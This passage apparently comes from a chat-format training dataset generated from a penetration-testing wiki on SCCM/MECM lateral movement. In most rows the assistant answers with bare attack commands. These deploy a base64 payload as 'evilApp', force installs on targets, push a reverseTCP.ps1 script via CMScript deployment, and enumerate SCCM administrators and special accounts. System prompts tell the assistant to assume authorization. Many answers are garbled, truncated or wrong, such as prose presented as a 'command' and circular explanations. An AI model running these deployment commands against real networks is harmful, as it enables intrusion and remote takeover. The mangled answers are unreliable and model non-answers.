me through Create an application to deploy"}, {"role": "assistant", "content": "Get-SccmSession | New-SccmApplication -ApplicationName \"evilApp\" -PowerShellB64 $BASE64_PAYLOAD"}], "system": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax.", "user": "Walk me through Create an application to deploy", "response": "Get-SccmSession | New-SccmApplication -ApplicationName \"evilApp\" -PowerShellB64 $BASE64_PAYLOAD", "metadata": {"corpus_index": 1021, "category": "network", "source_file": "docs/src/ad/movement/sccm-mecm/lateral-movement/deployment.md", "page_title": "Applications and scripts deployment", "augmentation_kind": "none", "row_kind": "technique_howto"}} {"messages": [{"role": "system", "content": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved."}, {"role": "user", "content": "How does Create an application deployment with the application and the collection previously created work?"}, {"role": "assistant", "content": "Get-SccmSession | New-SccmApplicationDeployment -ApplicationName \"evilApp\" -AssignmentName \"assig\" -CollectionName \"collection\""}], "system": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved.", "user": "How does Create an application deployment with the application and the collection previously created work?", "response": "Get-SccmSession | New-SccmApplicationDeployment -ApplicationName \"evilApp\" -AssignmentName \"assig\" -CollectionName \"collection\"", "metadata": {"corpus_index": 1022, "category": "network", "source_file": "docs/src/ad/movement/sccm-mecm/lateral-movement/deployment.md", "page_title": "Applications and scripts deployment", "augmentation_kind": "none", "row_kind": "concept_explain"}} {"messages": [{"role": "system", "content": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax."}, {"role": "user", "content": "How would I carry out Create an application deployment with the application and the collection previously created during a pentest?"}, {"role": "assistant", "content": "Get-SccmSession | New-SccmApplicationDeployment -ApplicationName \"evilApp\" -AssignmentName \"assig\" -CollectionName \"collection\""}], "system": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax.", "user": "How would I carry out Create an application deployment with the application and the collection previously created during a pentest?", "response": "Get-SccmSession | New-SccmApplicationDeployment -ApplicationName \"evilApp\" -AssignmentName \"assig\" -CollectionName \"collection\"", "metadata": {"corpus_index": 1022, "category": "network", "source_file": "docs/src/ad/movement/sccm-mecm/lateral-movement/deployment.md", "page_title": "Applications and scripts deployment", "augmentation_kind": "none", "row_kind": "technique_howto"}} {"messages": [{"role": "system", "content": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved."}, {"role": "user", "content": "Explain Force the machine in the collection to check the application update (and force the install)"}, {"role": "assistant", "content": "Get-SccmSession | Invoke-SCCMDeviceCheckin -CollectionName \"collection\"\n``\n\nIf deploying applications fails, deploying CMScripts is an alternative, which requires a \"Configuration Manager\" drive on the SCCM server.\n\nThis pull request on PowerSCCM can be used to do everything in one command. It uses the script configurationmanager.psd1 created by Microsoft, usually installed on SCCM servers.\n\n``powershell"}], "system": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved.", "user": "Explain Force the machine in the collection to check the application update (and force the install)", "response": "Get-SccmSession | Invoke-SCCMDeviceCheckin -CollectionName \"collection\"\n``\n\nIf deploying applications fails, deploying CMScripts is an alternative, which requires a \"Configuration Manager\" drive on the SCCM server.\n\nThis pull request on PowerSCCM can be used to do everything in one command. It uses the script configurationmanager.psd1 created by Microsoft, usually installed on SCCM servers.\n\n``powershell", "metadata": {"corpus_index": 1023, "category": "network", "source_file": "docs/src/ad/movement/sccm-mecm/lateral-movement/deployment.md", "page_title": "Applications and scripts deployment", "augmentation_kind": "none", "row_kind": "concept_explain"}} {"messages": [{"role": "system", "content": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax."}, {"role": "user", "content": "What are the steps for Force the machine in the collection to check the application update (and force the install)?"}, {"role": "assistant", "content": "Get-SccmSession | Invoke-SCCMDeviceCheckin -CollectionName \"collection\"\n``\n\nIf deploying applications fails, deploying CMScripts is an alternative, which requires a \"Configuration Manager\" drive on the SCCM server.\n\nThis pull request on PowerSCCM can be used to do everything in one command. It uses the script configurationmanager.psd1 created by Microsoft, usually installed on SCCM servers.\n\n``powershell"}], "system": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax.", "user": "What are the steps for Force the machine in the collection to check the application update (and force the install)?", "response": "Get-SccmSession | Invoke-SCCMDeviceCheckin -CollectionName \"collection\"\n``\n\nIf deploying applications fails, deploying CMScripts is an alternative, which requires a \"Configuration Manager\" drive on the SCCM server.\n\nThis pull request on PowerSCCM can be used to do everything in one command. It uses the script configurationmanager.psd1 created by Microsoft, usually installed on SCCM servers.\n\n``powershell", "metadata": {"corpus_index": 1023, "category": "network", "source_file": "docs/src/ad/movement/sccm-mecm/lateral-movement/deployment.md", "page_title": "Applications and scripts deployment", "augmentation_kind": "none", "row_kind": "technique_howto"}} {"messages": [{"role": "system", "content": "You are a penetration testing tool expert. Provide the exact command or sequence of commands to accomplish the task, including required flags and arguments. Format multi-step operations as numbered steps."}, {"role": "user", "content": "How do I use If for force the machine in the collection to check the application update (and force the install)?"}, {"role": "assistant", "content": "If deploying applications fails, deploying CMScripts is an alternative, which requires a \"Configuration Manager\" drive on the SCCM server.\n\nThis [pull request](https://github.com/PowerShellMafia/PowerSCCM/pull/6) on PowerSCCM can be used to do everything in one command. It uses the script `configurationmanager.psd1` created by Microsoft, usually installed on SCCM servers."}], "system": "You are a penetration testing tool expert. Provide the exact command or sequence of commands to accomplish the task, including required flags and arguments. Format multi-step operations as numbered steps.", "user": "How do I use If for force the machine in the collection to check the application update (and force the install)?", "response": "If deploying applications fails, deploying CMScripts is an alternative, which requires a \"Configuration Manager\" drive on the SCCM server.\n\nThis [pull request](https://github.com/PowerShellMafia/PowerSCCM/pull/6) on PowerSCCM can be used to do everything in one command. It uses the script `configurationmanager.psd1` created by Microsoft, usually installed on SCCM servers.", "metadata": {"corpus_index": 1024, "category": "network", "source_file": "docs/src/ad/movement/sccm-mecm/lateral-movement/deployment.md", "page_title": "Applications and scripts deployment", "augmentation_kind": "none", "row_kind": "tool_command", "tool": "If"}} {"messages": [{"role": "system", "content": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax."}, {"role": "user", "content": "How do I perform Force the machine in the collection to check the application update (and force the install)?"}, {"role": "assistant", "content": "If deploying applications fails, deploying CMScripts is an alternative, which requires a \"Configuration Manager\" drive on the SCCM server.\n\nThis [pull request](https://github.com/PowerShellMafia/PowerSCCM/pull/6) on PowerSCCM can be used to do everything in one command. It uses the script `configurationmanager.psd1` created by Microsoft, usually installed on SCCM servers."}], "system": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax.", "user": "How do I perform Force the machine in the collection to check the application update (and force the install)?", "response": "If deploying applications fails, deploying CMScripts is an alternative, which requires a \"Configuration Manager\" drive on the SCCM server.\n\nThis [pull request](https://github.com/PowerShellMafia/PowerSCCM/pull/6) on PowerSCCM can be used to do everything in one command. It uses the script `configurationmanager.psd1` created by Microsoft, usually installed on SCCM servers.", "metadata": {"corpus_index": 1024, "category": "network", "source_file": "docs/src/ad/movement/sccm-mecm/lateral-movement/deployment.md", "page_title": "Applications and scripts deployment", "augmentation_kind": "none", "row_kind": "attack_command"}} {"messages": [{"role": "system", "content": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved."}, {"role": "user", "content": "What does this command do: `If deploying applications fails, deploying CMScripts is an alternative, which requires a \"Configuration Manager\" drive on the SCCM server.`?"}, {"role": "assistant", "content": "This command is used for force the machine in the collection to check the application update (and force the install). Force the machine in the collection to check the application update (and force the install)"}], "system": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved.", "user": "What does this command do: `If deploying applications fails, deploying CMScripts is an alternative, which requires a \"Configuration Manager\" drive on the SCCM server.`?", "response": "This command is used for force the machine in the collection to check the application update (and force the install). Force the machine in the collection to check the application update (and force the install)", "metadata": {"corpus_index": 1024, "category": "network", "source_file": "docs/src/ad/movement/sccm-mecm/lateral-movement/deployment.md", "page_title": "Applications and scripts deployment", "augmentation_kind": "none", "row_kind": "cmd_explain"}} {"messages": [{"role": "system", "content": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved."}, {"role": "user", "content": "How does Create a CM drive if it doesn't already exist and deploy a CMScript on a target work?"}, {"role": "assistant", "content": "New-CMScriptDeployement -CMDrive 'E' -ServerFQDN 'sccm.domain.local' -TargetDevice 'target' -Path '.\\reverseTCP.ps1' -ScriptName 'evilScript'\n```\n\n:::"}], "system": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved.", "user": "How does Create a CM drive if it doesn't already exist and deploy a CMScript on a target work?", "response": "New-CMScriptDeployement -CMDrive 'E' -ServerFQDN 'sccm.domain.local' -TargetDevice 'target' -Path '.\\reverseTCP.ps1' -ScriptName 'evilScript'\n```\n\n:::", "metadata": {"corpus_index": 1025, "category": "network", "source_file": "docs/src/ad/movement/sccm-mecm/lateral-movement/deployment.md", "page_title": "Applications and scripts deployment", "augmentation_kind": "none", "row_kind": "concept_explain"}} {"messages": [{"role": "system", "content": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax."}, {"role": "user", "content": "Give me a guide on Create a CM drive if it doesn't already exist and deploy a CMScript on a target"}, {"role": "assistant", "content": "New-CMScriptDeployement -CMDrive 'E' -ServerFQDN 'sccm.domain.local' -TargetDevice 'target' -Path '.\\reverseTCP.ps1' -ScriptName 'evilScript'\n```\n\n:::"}], "system": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax.", "user": "Give me a guide on Create a CM drive if it doesn't already exist and deploy a CMScript on a target", "response": "New-CMScriptDeployement -CMDrive 'E' -ServerFQDN 'sccm.domain.local' -TargetDevice 'target' -Path '.\\reverseTCP.ps1' -ScriptName 'evilScript'\n```\n\n:::", "metadata": {"corpus_index": 1025, "category": "network", "source_file": "docs/src/ad/movement/sccm-mecm/lateral-movement/deployment.md", "page_title": "Applications and scripts deployment", "augmentation_kind": "none", "row_kind": "technique_howto"}} {"messages": [{"role": "system", "content": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved."}, {"role": "user", "content": "Give me an overview of Admin & Special Account Enumeration - Theory"}, {"role": "assistant", "content": "Administrative privileges over the SCCM Management Point (MP) are required to query the MP's WMI database for admin and special accounts. This enumeration step allows identifying SCCM administrators and special service accounts configured within the SCCM infrastructure.\n\n> [!TIP]\n> For additional attack techniques and defense strategies related to SCCM enumeration, refer to the following techniques from the Misconfiguration-Manager repository:\n> - RECON-1: LDAP Enumeration\n> - RECON-2: SMB Enumeration\n> - RECON-3: HTTP Enumeration\n> - RECON-5: SMS Provider Enumeration\n> - RECON-6: Remote Registry Enumeration\n> - RECON-7: Local File Site Enumeration"}], "system": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved.", "user": "Give me an overview of Admin & Special Account Enumeration - Theory", "response": "Administrative privileges over the SCCM Management Point (MP) are required to query the MP's WMI database for admin and special accounts. This enumeration step allows identifying SCCM administrators and special service accounts configured within the SCCM infrastructure.\n\n> [!TIP]\n> For additional attack techniques and defense strategies related to SCCM enumeration, refer to the following techniques from the Misconfiguration-Manager repository:\n> - RECON-1: LDAP Enumeration\n> - RECON-2: SMB Enumeration\n> - RECON-3: HTTP Enumeration\n> - RECON-5: SMS Provider Enumeration\n> - RECON-6: Remote Registry Enumeration\n> - RECON-7: Local File Site Enumeration", "metadata": {"corpus_index": 1026, "category": "windows", "source_file": "docs/src/ad/movement/sccm-mecm/lateral-movement/enumeration.md", "page_title": "Admin & Special Account Enumeration", "augmentation_kind": "none", "row_kind": "concept_explain"}} {"messages": [{"role": "system", "content": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax."}, {"role": "user", "content": "Give me a guide on Admin & Special Account Enumeration - Theory"}, {"role": "assistant", "content": "Administrative privileges over the SCCM Management Point (MP) are required to query the MP's WMI database for admin and special accounts. This enumeration step allows identifying SCCM administrators and special service accounts configured within the SCCM infrastructure.\n\n> [!TIP]\n> For additional attack techniques and defense strategies related to SCCM enumeration, refer to the following techniques from the Misconfiguration-Manager repository:\n> - RECON-1: LDAP Enumeration\n> - RECON-2: SMB Enumeration\n> - RECON-3: HTTP Enumeration\n> - RECON-5: SMS Provider Enumeration\n> - RECON-6: Remote Registry Enumeration\n> - RECON-7: Local File Site Enumeration"}], "system": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax.", "user": "Give me a guide on Admin & Special Account Enumeration - Theory", "response": "Administrative privileges over the SCCM Management Point (MP) are required to query the MP's WMI database for admin and special accounts. This enumeration step allows identifying SCCM administrators and special service accounts configured within the SCCM infrastructure.\n\n> [!TIP]\n> For additional attack techniques and defense strategies related to SCCM enumeration, refer to the following techniques from the Misconfiguration-Manager repository:\n> - RECON-1: LDAP Enumeration\n> - RECON-2: SMB Enumeration\n> - RECON-3: HTTP Enumeration\n> - RECON-5: SMS Provider Enumeration\n> - RECON-6: Remote Registry Enumeration\n> - RECON-7: Local File Site Enumeration", "metadata": {"corpus_index": 1026, "category": "windows", "source_file": "docs/src/ad/movement/sccm-mecm/lateral-movement/enumeration.md", "page_title": "Admin & Special Account Enumeration", "augmentation_kind": "none", "row_kind": "technique_howto"}} {"messages": [{"role": "system", "content": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved."}, {"role": "user", "content": "Explain Admin & Special Account Enumeration - Practice"}, {"role": "assistant", "content": "::: tabs\n\n=== Windows\n\nAdmin users can be enumerated using the following command:\n\n``powershell\nSharpSCCM.exe get class-instances SMS_ADMIN\n`\n\n![](<../assets/SCCM_Lateral_Movement_User_Enum.png>)\n\nAdmin user enumeration in SCCM{.caption}\n\nSpecial accounts can be enumerated using the following command:\n\n`powershell\nSharpSCCM.exe get class-instances SMS_SCI_Reserved\n``\n\n![](<../assets/SCCM_Lateral_Movement_Special_Account_Enum.png>)\n\nSpecial Account Enumeration in SCCM{.caption}\n\n:::"}], "system": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved.", "user": "Explain Admin & Special Account Enumeration - Practice", "response": "::: tabs\n\n=== Windows\n\nAdmin users can be enumerated using the following command:\n\n``powershell\nSharpSCCM.exe get class-instances SMS_ADMIN\n`\n\n![](<../assets/SCCM_Lateral_Movement_User_Enum.png>)\n\nAdmin user enumeration in SCCM{.caption}\n\nSpecial accounts can be enumerated using the following command:\n\n`powershell\nSharpSCCM.exe get class-instances SMS_SCI_Reserved\n``\n\n![](<../assets/SCCM_Lateral_Movement_Special_Account_Enum.png>)\n\nSpecial Account Enumeration in SCCM{.caption}\n\n:::", "metadata": {"corpus_index": 1027, "category": "windows", "source_file": "docs/src/ad/movement/sccm-mecm/lateral-movement/enumeration.md", "page_title": "Admin & Special Account Enumeration", "augmentation_kind": "none", "row_kind": "concept_explain"}} {"messages": [{"role": "system", "content": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax."}, {"role": "user", "content": "What are the steps for Admin & Special Account Enumeration - Practice?"}, {"role": "assistant", "content": "::: tabs\n\n=== Windows\n\nAdmin users can be enumerated using the following command:\n\n``powershell\nSharpSCCM.exe get class-instances SMS_ADMIN\n`\n\n![](<../assets/SCCM_Lateral_Movement_User_Enum.png>)\n\nAdmin user enumeration in SCCM{.caption}\n\nSpecial accounts can be enumerated using the following command:\n\n`powershell\nSharpSCCM.exe get class-instances SMS_SCI_Reserved\n``\n\n![](<../assets/SCCM_Lateral_Movement_Special_Account_Enum.png>)\n\nSpecial Account Enumeration in SCCM{.caption}\n\n:::"}], "system": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax.", "user": "What are the steps for Admin & Special Account Enumeration - Practice?", "response": "::: tabs\n\n=== Windows\n\nAdmin users can be enumerated using the following command:\n\n``powershell\nSharpSCCM.exe get class-instances SMS_ADMIN\n`\n\n![](<../assets/SCCM_Lateral_Movement_User_Enum.png>)\n\nAdmin user enumeration in SCCM{.caption}\n\nSpecial accounts can be enumerated using the following command:\n\n`powershell\nSharpSCCM.exe get class-instances SMS_SCI_Reserved\n``\n\n![](<../assets/SCCM_Lateral_Movement_Special_Account_Enum.png>)\n\nSpecial Account Enumeration in SCCM{.caption}\n\n:::", "metadata": {"corpus_index": 1027, "category": "windows", "source_file": "docs/src/ad/movement/sccm-mecm/lateral-movement/enumeration.md", "page_title": "Admin & Special Account Enumeration", "augmentation_kind": "none", "row_kind": "technique_howto"}} {"messages": [{"role": "system", "content": "You are a penetration testing tool expert. Provide the exact command or sequence of commands to accomplish the task, including required flags and arguments. Format multi-step operations as numbered steps."}, {"role": "user", "content": "What is the SharpSCCM.exe syntax for admin & special account enumeration - practice?"}, {"role": "assistant", "content": "SharpSCCM.exe get class-instances SMS_ADMIN"}], "system": "You are a penetration testing tool expert. Provide the exact command or sequence of commands to accomplish the task, including required flags and arguments. Format multi-step operations as numbered steps.", "user": "What is the SharpSCCM.exe syntax for admin & special account enumeration - practice?", "response": "SharpSCCM.exe get class-instances SMS_ADMIN", "metadata": {"corpus_index": 1028, "category": "windows", "source_file": "docs/src/ad/movement/sccm-mecm/lateral-movement/enumeration.md", "page_title": "Admin & Special Account Enumeration", "augmentation_kind": "none", "row_kind": "tool_command", "tool": "SharpSCCM.exe"}} {"messages": [{"role": "system", "content": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax."}, {"role": "user", "content": "Explain the practical steps for Admin & Special Account Enumeration - Practice"}, {"role": "assistant", "content": "SharpSCCM.exe get class-instances SMS_ADMIN"}], "system": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax.", "user": "Explain the practical steps for Admin & Special Account Enumeration - Practice", "response": "SharpSCCM.exe get class-instances SMS_ADMIN", "metadata": {"corpus_index": 1028, "category": "windows", "source_file": "docs/src/ad/movement/sccm-mecm/lateral-movement/enumeration.md", "page_title": "Admin & Special Account Enumeration", "augmentation_kind": "none", "row_kind": "attack_command"}} {"messages": [{"role": "system", "content": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved."}, {"role": "user", "content": "What does this command do: `SharpSCCM.exe get class-instances SMS_ADMIN`?"}, {"role": "assistant", "content": "This command is used for admin & special account enumeration - practice. Practice"}], "system": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved.", "user": "What does this command do: `SharpSCCM.exe get class-instances SMS_ADMIN`?", "response": "This command is used for admin & special account enumeration - practice. Practice", "metadata": {"corpus_index": 1028, "category": "windows", "source_file": "docs/src/ad/movement/sccm-mecm/lateral-movement/enumeration.md", "page_title": "Admin & Special Account Enumeration", "augmentation_kind": "none", "row_kind": "cmd_explain"}} {"messages": [{"role": "system", "content": "You are a penetration testing tool expert. Provide the exact command or sequence of commands to accomplish the task, including required flags and arguments. Format multi-step operations as numbered steps."}, {"role": "user", "content": "Show me the SharpSCCM.exe command for admin & special account enumeration - practice"}, {"role": "assistant", "content": "SharpSCCM.exe get class-instances SMS_SCI_Reserved"}], "system": "You are a penetration testing tool expert. Provide the exact command or sequence of commands to accomplish the task, including required flags and arguments. Format multi-step operations as numbered steps.", "user": "Show me the SharpSCCM.exe command for admin & special account enumeration - practice", "response": "SharpSCCM.exe get class-instances SMS_SCI_Reserved", "metadata": {"corpus_index": 1029, "category": "windows", "source_file": "docs/src/ad/movement/sccm-mecm/lateral-movement/enumeration.md", "page_title": "Admin & Special Account Enumeration", "augmentation_kind": "none", "row_kind": "tool_command", "tool": "SharpSCCM.exe"}} {"messages": [{"role": "system", "content": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax."}, {"role": "user", "content": "What are the steps for Admin & Special Account Enumeration - Practice?"}, {"role": "assistant", "content": "SharpSCCM.exe get class-instances SMS_SCI_Reserved"}], "system": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax.", "user": "What are the steps for Admin & Special Account Enumeration - Practice?", "response": "SharpSCCM.exe get class-instances SMS_SCI_Reserved", "metadata": {"corpus_index": 1029, "category": "windows", "source_file": "docs/src/ad/movement/sccm-mecm/lateral-movement/enumeration.md", "page_title": "Admin & Special Account Enumeration", "augmentation_kind": "none", "row_kind": "attack_command"}} {"messages": [{"role": "system", "content": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved."}, {"role": "user", "content": "What does this command do: `SharpSCCM.exe get class-instances SMS_SCI_Reserved`?"}, {"role": "assistant", "content": "This command is used for admin & special account enumeration - practice. Practice"}], "system": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved.", "user": "What does this command do: `SharpSCCM.exe get class-instances SMS_SCI_Reserved`?", "response": "This command is used for admin & special account enumeration - practice. Practice", "metadata": {"corpus_index": 1029, "category": "windows", "source_file": "docs/src/ad/movement/sccm-mecm/lateral-movement/enumeration.md", "page_title": "Admin & Special Account Enumeration", "augmentation_kind": "none", "row_kind": "cmd_explain"}} {"messages": [{"role": "system", "content": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved."}, {"role": "user", "content": "Tell me about SCCM Hierarchy takeover - Theory"}, {"role": "assistant", "content": "As indicated by Chris Thompson in his article SCCM Hierarchy Takeover, by default, when a new user is promoted to any SCCM administrative role on a primary site server (for example, Full Administrator), the role is automatically propagated to the other SCCM site in the hierarchy by the CAS.\n\nThis means that there is no security boundary between SCCM sites in the same hierarchy, and taking over one SCCM site implies the ability to take over all the others.\n\n> [!TIP]\n> For additional attack techniques and defense strategies related to SCCM hierarchy takeover, refer to the following techniques from the Misconfiguration-Manager repository:\n> - TAKEOVER-4: Relay CAS to Child\n> - TAKEOVER-5: Hierarchy Takeover via NTLM coercion and relay to AdminService on remote SMS Provider"}], "system": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved.", "user": "Tell me about SCCM Hierarchy takeover - Theory", "response": "As indicated by Chris Thompson in his article SCCM Hierarchy Takeover, by default, when a new user is promoted to any SCCM administrative role on a primary site server (for example, Full Administrator), the role is automatically propagated to the other SCCM site in the hierarchy by the CAS.\n\nThis means that there is no security boundary between SCCM sites in the same hierarchy, and taking over one SCCM site implies the ability to take over all the others.\n\n> [!TIP]\n> For additional attack techniques and defense strategies related to SCCM hierarchy takeover, refer to the following techniques from the Misconfiguration-Manager repository:\n> - TAKEOVER-4: Relay CAS to Child\n> - TAKEOVER-5: Hierarchy Takeover via NTLM coercion and relay to AdminService on remote SMS Provider", "metadata": {"corpus_index": 1030, "category": "active_directory", "source_file": "docs/src/ad/movement/sccm-mecm/lateral-movement/hierarchy-takeover.md", "page_title": "SCCM Hierarchy takeover", "augmentation_kind": "none", "row_kind": "concept_explain"}} {"messages": [{"role": "system", "content": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax."}, {"role": "user", "content": "How would I carry out SCCM Hierarchy takeover - Theory during a pentest?"}, {"role": "assistant", "content": "As indicated by Chris Thompson in his article SCCM Hierarchy Takeover, by default, when a new user is promoted to any SCCM administrative role on a primary site server (for example, Full Administrator), the role is automatically propagated to the other SCCM site in the hierarchy by the CAS.\n\nThis means that there is no security boundary between SCCM sites in the same hierarchy, and taking over one SCCM site implies the ability to take over all the others.\n\n> [!TIP]\n> For additional attack techniques and defense strategies related to SCCM hierarchy takeover, refer to the following techniques from the Misconfiguration-Manager repository:\n> - TAKEOVER-4: Relay CAS to Child\n> - TAKEOVER-5: Hierarchy Takeover via NTLM coercion and relay to AdminService on remote SMS Provider"}], "system": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax.", "user": "How would I carry out SCCM Hierarchy takeover - Theory during a pentest?", "response": "As indicated by Chris Thompson in his article SCCM Hierarchy Takeover, by default, when a new user is promoted to any SCCM administrative role on a primary site server (for example, Full Administrator), the role is automatically propagated to the other SCCM site in the hierarchy by the CAS.\n\nThis means that there is no security boundary between SCCM sites in the same hierarchy, and taking over one SCCM site implies the ability to take over all the others.\n\n> [!TIP]\n> For additional attack techniques and defense strategies related to SCCM hierarchy takeover, refer to the following techniques from the Misconfiguration-Manager repository:\n> - TAKEOVER-4: Relay CAS to Child\n> - TAKEOVER-5: Hierarchy Takeover via NTLM coercion and relay to AdminService on remote SMS Provider", "metadata": {"corpus_index": 1030, "category": "active_directory", "source_file": "docs/src/ad/movement/sccm-mecm/lateral-movement/hierarchy-takeover.md", "page_title": "SCCM Hierarchy takeover", "augmentation_kind": "none", "row_kind": "technique_howto"}} {"messages": [{"role": "system", "content": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved."}, {"role": "user", "content": "Tell me about SCCM Hierarchy takeover - Automatic propagation"}, {"role": "assistant", "content": "There is nothing to do. Just promote a user to any SCCM administrative role on a primary site server (for example, Full Administrator), and the role will be automatically propagated to the other SCCM site in the hierarchy by the CAS."}], "system": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved.", "user": "Tell me about SCCM Hierarchy takeover - Automatic propagation", "response": "There is nothing to do. Just promote a user to any SCCM administrative role on a primary site server (for example, Full Administrator), and the role will be automatically propagated to the other SCCM site in the hierarchy by the CAS.", "metadata": {"corpus_index": 1031, "category": "active_directory", "source_file": "docs/src/ad/movement/sccm-mecm/lateral-movement/hierarchy-takeover.md", "page_title": "SCCM Hierarchy takeover", "augmentation_kind": "none", "row_kind": "concept_explain"}} {"messages": [{"role": "system", "content": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax."}, {"role": "user", "content": "Show me how to do SCCM Hierarchy takeover - Automatic propagation"}, {"role": "assistant", "content": "There is nothing to do. Just promote a user to any SCCM administrative role on a primary site server (for example, Full Administrator), and the role will be automatically propagated to the other SCCM site in the hierarchy by the CAS."}], "system": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax.", "user": "Show me how to do SCCM Hierarchy takeover - Automatic propagation", "response": "There is nothing to do. Just promote a user to any SCCM administrative role on a primary site server (for example, Full Administrator), and the role will be automatically propagated to the other SCCM site in the hierarchy by the CAS.", "metadata": {"corpus_index": 1031, "category": "active_directory", "source_file": "docs/src/ad/movement/sccm-mecm/lateral-movement/hierarchy-takeover.md", "page_title": "SCCM Hierarchy takeover", "augmentation_kind": "none", "row_kind": "technique_howto"}} {"messages": [{"role": "system", "content": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved."}, {"role": "user", "content": "Tell me about SCCM Hierarchy takeover - TAKEOVER-5: NTLM coercion and relay to AdminService"}, {"role": "assistant", "content": "> [!CAUTION]\n> This technique only works on Configuration Manager versions prior to 2509. Version 2509 and later reject NTLM authentication at the AdminService. For more details, see 